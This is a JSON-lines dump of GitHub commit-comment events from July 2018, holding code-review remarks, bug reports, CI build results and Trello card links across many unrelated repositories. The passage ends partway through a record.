{"id":"7967836257","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_system_extras_su"},"payload":{"comment":{"id":29714056,"position":null,"line":null,"path":null,"commit_id":"90afa4f6d20ac51b13877832a3a87b56b850fbfd","created_at":"2018-07-15T19:34:45Z","updated_at":"2018-07-15T19:34:45Z","author_association":"MEMBER","body":"LOL\r\nwasn't aware of this \r\nusing Magisk because of Viper4Android but this is stupid\r\nno idea why they made this"}},"created_at":"2018-07-15T19:34:45Z"}
{"id":"7967837364","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":29714058,"position":78,"line":78,"path":"wcfsetup/install/files/lib/system/worker/DatabaseConvertEncodingWorker.class.php","commit_id":"6c1b515cfe1e3cb65b110c3370b0f9f48970351d","created_at":"2018-07-15T19:35:27Z","updated_at":"2018-07-15T19:35:27Z","author_association":"CONTRIBUTOR","body":"`PreparedStatement->fetchAll()` would fit too, wouldn't it?"}},"created_at":"2018-07-15T19:35:27Z"}
{"id":"7967842894","type":"CommitCommentEvent","actor":{"login":"hellcatz"},"repo":{"name":"blbradley/zcash-swing-wallet-ui"},"payload":{"comment":{"id":29714063,"position":null,"line":null,"path":null,"commit_id":"246a34260a37fda8fd8e56bf2dc8da178bbde6fc","created_at":"2018-07-15T19:39:40Z","updated_at":"2018-07-15T19:39:40Z","author_association":"NONE","body":"A lot of special Italian chars got lost in this commit.\r\nExample: `più`  now `pi�`\r\nExample: `fallirà` now `fallir�`\r\n\r\nsrc/resources/messages/zencash_it.properties"}},"created_at":"2018-07-15T19:39:40Z"}
{"id":"7967843071","type":"CommitCommentEvent","actor":{"login":"dcbriccetti"},"repo":{"name":"dcbriccetti/javarosa"},"payload":{"comment":{"id":29714065,"position":5,"line":1323,"path":"src/org/javarosa/xform/parse/XFormParser.java","commit_id":"20e357fca5b3497a4f9fa5f7138e8f08922c7034","created_at":"2018-07-15T19:39:48Z","updated_at":"2018-07-15T19:39:48Z","author_association":"OWNER","body":"The formal parameter `qparent` is now unused."}},"created_at":"2018-07-15T19:39:48Z"}
{"id":"7967843836","type":"CommitCommentEvent","actor":{"login":"shuayb"},"repo":{"name":"toolboc/faithcoin"},"payload":{"comment":{"id":29714066,"position":null,"line":null,"path":null,"commit_id":"998a8e666ce04f09ed156b1aaa4a1813dcceacc2","created_at":"2018-07-15T19:40:21Z","updated_at":"2018-07-15T19:40:21Z","author_association":"NONE","body":"Thank you so much for replying so fast. Yes, it helped me a lot."}},"created_at":"2018-07-15T19:40:21Z"}
{"id":"7967844142","type":"CommitCommentEvent","actor":{"login":"PitouGames"},"repo":{"name":"ouest-insa/Incipio"},"payload":{"comment":{"id":29714067,"position":7,"line":6,"path":"src/Mgate/SuiviBundle/Resources/views/Etude/Buttons/Suiveur.html.twig","commit_id":"75d8684b351e4fe537fbe9ef9c830816e8281993","created_at":"2018-07-15T19:40:34Z","updated_at":"2018-07-15T19:40:34Z","author_association":"COLLABORATOR","body":"Je suis d'accord que ce n'est peut-être pas le fix idéal, mais avec la version courante, ça donne ça :\r\n![pingpong](https://user-images.githubusercontent.com/22180158/42737644-24f9c9c4-8877-11e8-9faf-f9732a386437.JPG)\r\nJe trouve que c'est quand même un peu mieux de voir le nom en entier si la taille de l'écran le permet.\r\nSinon je veux bien une idée pour améliorer encore cet affichage :wink:"}},"created_at":"2018-07-15T19:40:34Z"}
{"id":"7967845279","type":"CommitCommentEvent","actor":{"login":"EstibalizFernandez"},"repo":{"name":"EstibalizFernandez/lab-authentication-with-passport"},"payload":{"comment":{"id":29714075,"position":null,"line":null,"path":null,"commit_id":"8ade0b00dc3fc28e349e67286997c7af996d4a87","created_at":"2018-07-15T19:41:16Z","updated_at":"2018-07-15T19:41:16Z","author_association":"OWNER","body":"Sign-up Feature\r\n-> Create users in BBDD Ok "}},"created_at":"2018-07-15T19:41:16Z"}
{"id":"7967845332","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"0ADMods/terra_magna"},"payload":{"comment":{"id":29714076,"position":null,"line":null,"path":null,"commit_id":"599433ac7bfbdc3b87b776b4d8cfc0f24fc19376","created_at":"2018-07-15T19:41:18Z","updated_at":"2018-07-15T19:41:18Z","author_association":"CONTRIBUTOR","body":"@StanleySweet \r\n\r\nIf you perhaps find time for modeling the missing china buildings(range, siegeworkshop), I may find some time to make them work in game."}},"created_at":"2018-07-15T19:41:18Z"}
{"id":"7967846921","type":"CommitCommentEvent","actor":{"login":"dschmenk"},"repo":{"name":"dschmenk/PLASMA"},"payload":{"comment":{"id":29714078,"position":null,"line":null,"path":null,"commit_id":"8f408c8bbb1582dbebd7d2cdb0f7389da059971a","created_at":"2018-07-15T19:42:15Z","updated_at":"2018-07-15T19:42:15Z","author_association":"OWNER","body":"Hi Eric - Brendan Robert helped me with this code. Basically what SkyFox uses to find a MockingBoard. And doesn't cause trouble if a SoftCard is installed."}},"created_at":"2018-07-15T19:42:15Z"}
{"id":"7967847088","type":"CommitCommentEvent","actor":{"login":"carols10cents"},"repo":{"name":"sgrif/crates.io"},"payload":{"comment":{"id":29714079,"position":15,"line":15,"path":"src/job.rs","commit_id":"de9d9bf2aa177b64133ad7b1027616cfe5b458f5","created_at":"2018-07-15T19:42:20Z","updated_at":"2018-07-15T19:42:20Z","author_association":"NONE","body":"Why a string rather than an enum for job type?"}},"created_at":"2018-07-15T19:42:20Z"}
{"id":"7967847976","type":"CommitCommentEvent","actor":{"login":"joernweissenborn"},"repo":{"name":"glotaran/glotaran"},"payload":{"comment":{"id":29714083,"position":null,"line":null,"path":null,"commit_id":"4d85e639cb3b6c5d7f93ec53d77974e53503346e","created_at":"2018-07-15T19:42:56Z","updated_at":"2018-07-15T19:42:56Z","author_association":"CONTRIBUTOR","body":"Yeah, something like that. There should be an issue for that, if not please\ncreate.\n\ns-weigand <notifications@github.com> schrieb am So., 15. Juli 2018, 7:27\nnachm.:\n\n> Nice change :D\n> But i think methods set_data/get_data on datasets would be even more\n> intuitiv (additional conveniece methods as short hand).\n>\n> Like:\n> dataset.set_data(data, dataset_name=\"dataset1\")\n> dataset.get_data(dataset_name=\"dataset1\")\n>\n> If dataset_name isn't set, you could just use the first one on get data\n> and throw a warning if there are multiple datasets.\n> For set_data I would have dataset_name mendatory (Exception), so ppl\n> won't accidently overwrite data.\n>\n> Just an idea, open for discussion ^^\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/glotaran/glotaran/commit/4d85e639cb3b6c5d7f93ec53d77974e53503346e#commitcomment-29713602>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACJvwWnHveOYslxacWwMEUNVApgFbMPpks5uG3uQgaJpZM4VQUnr>\n> .\n>\n"}},"created_at":"2018-07-15T19:42:56Z"}
{"id":"7967855336","type":"CommitCommentEvent","actor":{"login":"jaredchris"},"repo":{"name":"zdrouse/Auto-Amazon-Giveaways"},"payload":{"comment":{"id":29714086,"position":null,"line":null,"path":null,"commit_id":"2779c87e5602f380a7037c35438d3745c1467b04","created_at":"2018-07-15T19:47:44Z","updated_at":"2018-07-15T19:47:44Z","author_association":"NONE","body":"Very cool!!\r\n\r\nRuns pretty well until several items in -- \"TypeError: Object of type 'ElementHandle' is not JSON serializable\""}},"created_at":"2018-07-15T19:47:44Z"}
{"id":"7967856895","type":"CommitCommentEvent","actor":{"login":"carols10cents"},"repo":{"name":"sgrif/crates.io"},"payload":{"comment":{"id":29714092,"position":74,"line":74,"path":"src/job.rs","commit_id":"de9d9bf2aa177b64133ad7b1027616cfe5b458f5","created_at":"2018-07-15T19:48:59Z","updated_at":"2018-07-15T19:48:59Z","author_association":"NONE","body":"I'm confused about how this is only going to retry *failed* jobs (which is what the doc comment for increment retries says it does). It looks like on line 65 that job_id always gets set to Some? How does job_id get set to None if the job succeeds?"}},"created_at":"2018-07-15T19:48:59Z"}
{"id":"7967857816","type":"CommitCommentEvent","actor":{"login":"whatevers"},"repo":{"name":"Pearson-Higher-Ed/elements-sdk"},"payload":{"comment":{"id":29714095,"position":19,"line":27,"path":"src/styles/base/_mixins.scss","commit_id":"1d77bdf3f0a254d2265fd947bdb8f561886e84bc","created_at":"2018-07-15T19:49:44Z","updated_at":"2018-07-15T19:49:44Z","author_association":"NONE","body":"That's in Pearson Prep. They're using pill-shaped buttons. After posting my comment I figured manually editing would be the way to go. I've see the :after approach used so outlines only appear with keyboard focus, but not with mouse clicks (super clever!) Is that what we're going for?"}},"created_at":"2018-07-15T19:49:44Z"}
{"id":"7967857888","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29714096,"position":null,"line":null,"path":null,"commit_id":"b081ae267e28da73b77341e24812a5f1311b51c9","created_at":"2018-07-15T19:49:47Z","updated_at":"2018-07-15T19:49:47Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-141](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-141).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-141-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-15T19:49:47Z"}
{"id":"7967858097","type":"CommitCommentEvent","actor":{"login":"blbradley"},"repo":{"name":"blbradley/zcash-swing-wallet-ui"},"payload":{"comment":{"id":29714097,"position":null,"line":null,"path":null,"commit_id":"246a34260a37fda8fd8e56bf2dc8da178bbde6fc","created_at":"2018-07-15T19:49:58Z","updated_at":"2018-07-15T19:49:58Z","author_association":"OWNER","body":"Odd, I used IntelliJ for the find/replace on this. I'll look into it. Thanks!"}},"created_at":"2018-07-15T19:49:58Z"}
{"id":"7967860097","type":"CommitCommentEvent","actor":{"login":"OnSunday18"},"repo":{"name":"OnSunday18/repoByMian"},"payload":{"comment":{"id":29714099,"position":null,"line":null,"path":null,"commit_id":"1739ffe8e931f6ec125b4ab66ffdd1616f363b72","created_at":"2018-07-15T19:51:34Z","updated_at":"2018-07-15T19:51:34Z","author_association":"OWNER","body":"// A first comment"}},"created_at":"2018-07-15T19:51:34Z"}
{"id":"7967860110","type":"CommitCommentEvent","actor":{"login":"jeffmcaffer"},"repo":{"name":"clearlydefined/crawler"},"payload":{"comment":{"id":29714100,"position":5,"line":7,"path":"package.json","commit_id":"1567d78abb7c1ee00c4ef89129ae9f1c56c92df4","created_at":"2018-07-15T19:51:34Z","updated_at":"2018-07-15T19:51:34Z","author_association":"MEMBER","body":"@geneh  this does not work on Windows and breaks the `npm start` workflow. Need to find a different way to set the default port"}},"created_at":"2018-07-15T19:51:34Z"}
{"id":"7967860157","type":"CommitCommentEvent","actor":{"login":"TommyClausner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29714101,"position":37,"line":2335,"path":"mne/source_estimate.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-15T19:51:36Z","updated_at":"2018-07-15T19:51:36Z","author_association":"NONE","body":"Wouldn't it be nicer if one would have to write:\r\n```\r\nsource_morph = SourceMorph(src)\r\nstc_to = source_morph(stc_from)\r\n```\r\nor even\r\n```\r\nstc_to = SourceMorph(src)(stc_from)\r\n```"}},"created_at":"2018-07-15T19:51:36Z"}
{"id":"7967860725","type":"CommitCommentEvent","actor":{"login":"hqx1223614734"},"repo":{"name":"hqx1223614734/picCart-WebApp"},"payload":{"comment":{"id":29714104,"position":null,"line":null,"path":null,"commit_id":"e946b3abc1e983d13d4fc5040c22ab19b2f597cd","created_at":"2018-07-15T19:52:07Z","updated_at":"2018-07-15T19:52:07Z","author_association":"OWNER","body":"shide"}},"created_at":"2018-07-15T19:52:07Z"}
{"id":"7967861710","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29714106,"position":null,"line":null,"path":null,"commit_id":"ea10cdb8156fa6deed1991a7b68d82ad0255e1e7","created_at":"2018-07-15T19:52:55Z","updated_at":"2018-07-15T19:52:55Z","author_association":"MEMBER","body":"if exists does threat an empty string as false then yes"}},"created_at":"2018-07-15T19:52:55Z"}
{"id":"7967862043","type":"CommitCommentEvent","actor":{"login":"PitouGames"},"repo":{"name":"ouest-insa/Incipio"},"payload":{"comment":{"id":29714107,"position":7,"line":128,"path":"web/css/skin-n7c.min.css","commit_id":"75d8684b351e4fe537fbe9ef9c830816e8281993","created_at":"2018-07-15T19:53:10Z","updated_at":"2018-07-15T19:53:10Z","author_association":"COLLABORATOR","body":"It's ok with the RM field :\r\n![capture](https://user-images.githubusercontent.com/22180158/42737792-0a3861b6-8879-11e8-947b-6d49230a1719.JPG)\r\nI havn't see impact on other dropdown, but maybe I miss them 🤔 \r\n"}},"created_at":"2018-07-15T19:53:10Z"}
{"id":"7967864493","type":"CommitCommentEvent","actor":{"login":"Tsuihao"},"repo":{"name":"Tsuihao/CarND-Term1-Starter-Kit"},"payload":{"comment":{"id":29714109,"position":9,"line":25,"path":"Dockerfile.cpu","commit_id":"0687915789f41e4040fe6d9c22f4c66e43a8e766","created_at":"2018-07-15T19:55:07Z","updated_at":"2018-07-15T19:55:07Z","author_association":"OWNER","body":"add conda update, so the version is not that important anymore."}},"created_at":"2018-07-15T19:55:07Z"}
{"id":"7967865300","type":"CommitCommentEvent","actor":{"login":"alecgorge"},"repo":{"name":"RelistenNet/relisten-web"},"payload":{"comment":{"id":29714110,"position":null,"line":null,"path":null,"commit_id":"b2a8373144b0dbd99dc553dcb23c336796ffe5dc","created_at":"2018-07-15T19:55:42Z","updated_at":"2018-07-15T19:55:42Z","author_association":"MEMBER","body":"We should generate this on sever start before the port is bound. Relatedly, I wanted to add a UI bit to the API server to allow us to curate the order of the artists"}},"created_at":"2018-07-15T19:55:42Z"}
{"id":"7967866521","type":"CommitCommentEvent","actor":{"login":"FellippeHeitor"},"repo":{"name":"Galleondragon/qb64"},"payload":{"comment":{"id":29714112,"position":null,"line":null,"path":null,"commit_id":"bc6b427a994c03a5192766aad0dd6e301575bee6","created_at":"2018-07-15T19:56:38Z","updated_at":"2018-07-15T19:56:38Z","author_association":"COLLABORATOR","body":"Sample usage:\r\n\r\n    fullPath$ = \"C:\\Documents and Settings\\Administrator\\Desktop\\qb64\\internal\\c\\libqb\\os\\win\\libqb_1_2_000000000000.o\"\r\n    file$ = MID$(fullPath$, _INSTRREV(fullPath$, \"\\\") + 1)\r\n    PRINT file$\r\n"}},"created_at":"2018-07-15T19:56:38Z"}
{"id":"7967868185","type":"CommitCommentEvent","actor":{"login":"zrbecker"},"repo":{"name":"zrbecker/squaregame"},"payload":{"comment":{"id":29714114,"position":1,"line":13,"path":"public/game.js","commit_id":"76dc0c58e304b390bf6707b6cb2f4834558c8d1b","created_at":"2018-07-15T19:57:54Z","updated_at":"2018-07-15T19:57:54Z","author_association":"OWNER","body":"this is a game zbecker created"}},"created_at":"2018-07-15T19:57:54Z"}
{"id":"7967868362","type":"CommitCommentEvent","actor":{"login":"InnocentZaib"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29714115,"position":null,"line":null,"path":null,"commit_id":"638c50c6bd42e356cef39706699429aff19be44e","created_at":"2018-07-15T19:58:02Z","updated_at":"2018-07-15T19:58:02Z","author_association":"NONE","body":"@jdecuirm  Thank You So Much.. Bro you Solved my Problem... By simply answer....\r\ncreate new project with Authnetication --> Individual Authentication..\r\nAWESOME BRO"}},"created_at":"2018-07-15T19:58:02Z"}
{"id":"7967870950","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29714118,"position":null,"line":null,"path":null,"commit_id":"2faef250227e996895aacca5fa62e90d17602a7a","created_at":"2018-07-15T19:59:56Z","updated_at":"2018-07-15T19:59:56Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2319 of 2319 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2faef250227e996895aacca5fa62e90d17602a7a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T19:59:56Z"}
{"id":"7966653390","type":"CommitCommentEvent","actor":{"login":"WalkerKnapp"},"repo":{"name":"Mysterypotatoguy/Javacord"},"payload":{"comment":{"id":29711083,"position":null,"line":null,"path":null,"commit_id":"5306a8a57521bb5ca423ec6489eda3c1020c347c","created_at":"2018-07-15T02:00:08Z","updated_at":"2018-07-15T02:00:08Z","author_association":"NONE","body":"^"}},"created_at":"2018-07-15T02:00:08Z"}
{"id":"7966662336","type":"CommitCommentEvent","actor":{"login":"Nick233333"},"repo":{"name":"Nick233333/koa2"},"payload":{"comment":{"id":29711097,"position":36,"line":48,"path":"index.js","commit_id":"b23c6194f09098dffa1c26118e3da5570d80bf4c","created_at":"2018-07-15T02:09:15Z","updated_at":"2018-07-15T02:09:15Z","author_association":"OWNER","body":"密码已修改"}},"created_at":"2018-07-15T02:09:15Z"}
{"id":"7966664508","type":"CommitCommentEvent","actor":{"login":"suufi"},"repo":{"name":"APStudentsReddit/ping_manager"},"payload":{"comment":{"id":29711100,"position":5,"line":82,"path":"ping_manager.py","commit_id":"42b7e8c59be83c2d50527612e63ce0040e0ea03e","created_at":"2018-07-15T02:11:33Z","updated_at":"2018-07-15T02:11:33Z","author_association":"NONE","body":"never show token"}},"created_at":"2018-07-15T02:11:33Z"}
{"id":"7966664989","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29711101,"position":null,"line":null,"path":null,"commit_id":"59bd31f7c3d96a0923c2da4b8c803c30fbd2dd7e","created_at":"2018-07-15T02:12:06Z","updated_at":"2018-07-15T02:12:06Z","author_association":"OWNER","body":"Also re-added occurrences"}},"created_at":"2018-07-15T02:12:06Z"}
{"id":"7966668184","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29711108,"position":null,"line":null,"path":null,"commit_id":"a1504d1d33c73a823cfd0d2896ac125d46652b40","created_at":"2018-07-15T02:15:38Z","updated_at":"2018-07-15T02:15:38Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gerar estatísticas na forma de relatório para o ADM](https://trello.com/c/BgeJC9Kj/218-gerar-estat%C3%ADsticas-na-forma-de-relat%C3%B3rio-para-o-adm)"}},"created_at":"2018-07-15T02:15:38Z"}
{"id":"7966668335","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29711109,"position":null,"line":null,"path":null,"commit_id":"a8a6b30241eb3322ff14c56ac5a4320870ac4e6e","created_at":"2018-07-15T02:15:47Z","updated_at":"2018-07-15T02:15:47Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (RKStrand) - Win64-Windows-7-VisualStudio-14: Tests Failed (2591 of 2941 tests passed, 80 test warnings)\n\nMessages:\n\n * 427 tests had: EIO diffs.\n * 285 tests had: ESO big diffs.\n * 135 tests had: Table small diffs.\n * 136 tests had: ESO small diffs.\n * 125 tests had: SSZ small diffs.\n * 86 tests had: ZSZ small diffs.\n * 266 tests had: Table big diffs.\n * 11 tests had: AUD diffs.\n * 101 tests had: ZSZ big diffs.\n * 36 tests had: ERR diffs.\n * 15 tests had: SSZ big diffs.\n * 44 tests had: MTR small diffs.\n * 51 tests had: MTR big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 650\n * Failed: 1\n\nregression Test Summary\n * Passed: 274\n * Failed: 349\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a8a6b30241eb3322ff14c56ac5a4320870ac4e6e-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.1%25-red.png)</a> \n"}},"created_at":"2018-07-15T02:15:47Z"}
{"id":"7966668425","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29711110,"position":null,"line":null,"path":null,"commit_id":"d6527a4489468238d758a2009c632efa993d58e4","created_at":"2018-07-15T02:15:55Z","updated_at":"2018-07-15T02:15:55Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gerar estatísticas na forma de relatório para o ADM](https://trello.com/c/BgeJC9Kj/218-gerar-estat%C3%ADsticas-na-forma-de-relat%C3%B3rio-para-o-adm)"}},"created_at":"2018-07-15T02:15:55Z"}
{"id":"7966680322","type":"CommitCommentEvent","actor":{"login":"Songyan0501"},"repo":{"name":"Songyan0501/Hello-world"},"payload":{"comment":{"id":29711119,"position":3,"line":3,"path":"README.md","commit_id":"a0ff3a35bf2bb97229996fcef76b91436ff6a658","created_at":"2018-07-15T02:29:44Z","updated_at":"2018-07-15T02:29:44Z","author_association":"OWNER","body":"This is  try  to  add  other information  ,and  compare with  loacal  and   remote"}},"created_at":"2018-07-15T02:29:44Z"}
{"id":"7966682974","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711128,"position":null,"line":null,"path":null,"commit_id":"c77267d4ee58a078cf5566dabda83429d75eedef","created_at":"2018-07-15T02:32:29Z","updated_at":"2018-07-15T02:32:29Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [SSL hardening for split-stack deployment](https://trello.com/c/MFtR9yQl/63-ssl-hardening-for-split-stack-deployment)"}},"created_at":"2018-07-15T02:32:29Z"}
{"id":"7966683199","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711129,"position":null,"line":null,"path":null,"commit_id":"5be45603b610d5c049e323f04c31eb858699577f","created_at":"2018-07-15T02:32:44Z","updated_at":"2018-07-15T02:32:44Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [SSL hardening for split-stack deployment](https://trello.com/c/MFtR9yQl/63-ssl-hardening-for-split-stack-deployment)"}},"created_at":"2018-07-15T02:32:44Z"}
{"id":"7966684631","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711134,"position":null,"line":null,"path":null,"commit_id":"1c181fb45f701eb6f1f7cb9e8666b45976c5c8de","created_at":"2018-07-15T02:33:59Z","updated_at":"2018-07-15T02:33:59Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Ensure default route on controllers is useful for external connections](https://trello.com/c/JzQFLfRX/64-ensure-default-route-on-controllers-is-useful-for-external-connections)"}},"created_at":"2018-07-15T02:33:59Z"}
{"id":"7966685283","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29711135,"position":null,"line":null,"path":null,"commit_id":"b654e9bf987328fcdb7edd2e890534fdff93ee39","created_at":"2018-07-15T02:34:43Z","updated_at":"2018-07-15T02:34:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Crayons](https://trello.com/c/9A6lNHFk/11-crayons)"}},"created_at":"2018-07-15T02:34:43Z"}
{"id":"7966685775","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711137,"position":null,"line":null,"path":null,"commit_id":"8137822ea971394e9f369e7d6995be12d0c08dd9","created_at":"2018-07-15T02:35:18Z","updated_at":"2018-07-15T02:35:18Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Lbaas Horizon Panel does not seem to be there](https://trello.com/c/2UKVOYId/67-lbaas-horizon-panel-does-not-seem-to-be-there)"}},"created_at":"2018-07-15T02:35:18Z"}
{"id":"7966685817","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29711138,"position":null,"line":null,"path":null,"commit_id":"88a9488828d27f873774121bf045fe2afea98413","created_at":"2018-07-15T02:35:21Z","updated_at":"2018-07-15T02:35:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bot prefix](https://trello.com/c/eDWW8ArF/14-bot-prefix)"}},"created_at":"2018-07-15T02:35:21Z"}
{"id":"7966685906","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29711139,"position":null,"line":null,"path":null,"commit_id":"88a9488828d27f873774121bf045fe2afea98413","created_at":"2018-07-15T02:35:28Z","updated_at":"2018-07-15T02:35:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Stopping the Bot](https://trello.com/c/aHNIGPKM/20-stopping-the-bot)"}},"created_at":"2018-07-15T02:35:28Z"}
{"id":"7966685999","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29711140,"position":null,"line":null,"path":null,"commit_id":"88a9488828d27f873774121bf045fe2afea98413","created_at":"2018-07-15T02:35:36Z","updated_at":"2018-07-15T02:35:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Flip a Coin](https://trello.com/c/Pjl36kS6/3-flip-a-coin)"}},"created_at":"2018-07-15T02:35:36Z"}
{"id":"7966686171","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711141,"position":null,"line":null,"path":null,"commit_id":"24b60516a38fee69bdcd791d55d555c253ba925e","created_at":"2018-07-15T02:35:50Z","updated_at":"2018-07-15T02:35:50Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Enable radosgw integration](https://trello.com/c/Lc88Awej/61-enable-radosgw-integration)"}},"created_at":"2018-07-15T02:35:50Z"}
{"id":"7966686592","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711143,"position":null,"line":null,"path":null,"commit_id":"b15143ad2e8062e129f0f89d75c850e73563a02d","created_at":"2018-07-15T02:36:21Z","updated_at":"2018-07-15T02:36:21Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Activate Sahara (?)](https://trello.com/c/A7ZhRzPo/57-activate-sahara)"}},"created_at":"2018-07-15T02:36:21Z"}
{"id":"7966687154","type":"CommitCommentEvent","actor":{"login":"TylerJunek"},"repo":{"name":"TylerJunek/Simplic_Website"},"payload":{"comment":{"id":29711145,"position":null,"line":null,"path":null,"commit_id":"3d0c0d9c85df2ac26f071dc4f1d017b9e9275805","created_at":"2018-07-15T02:37:04Z","updated_at":"2018-07-15T02:37:04Z","author_association":"OWNER","body":"Okay."}},"created_at":"2018-07-15T02:37:04Z"}
{"id":"7966687814","type":"CommitCommentEvent","actor":{"login":"larsks"},"repo":{"name":"CCI-MOC/rhosp-director-config"},"payload":{"comment":{"id":29711146,"position":null,"line":null,"path":null,"commit_id":"d31c553b791220788151325ef6bfa1478fd7358c","created_at":"2018-07-15T02:37:57Z","updated_at":"2018-07-15T02:37:57Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Change nova policy to allow users to reset vm state](https://trello.com/c/5UvgZJvk/59-change-nova-policy-to-allow-users-to-reset-vm-state)"}},"created_at":"2018-07-15T02:37:57Z"}
{"id":"7966687821","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29711147,"position":null,"line":null,"path":null,"commit_id":"8b1e5a092fa43a51a252f62cd82ea6373d632421","created_at":"2018-07-15T02:37:57Z","updated_at":"2018-07-15T02:37:57Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Unknown) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2693 of 2693 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage 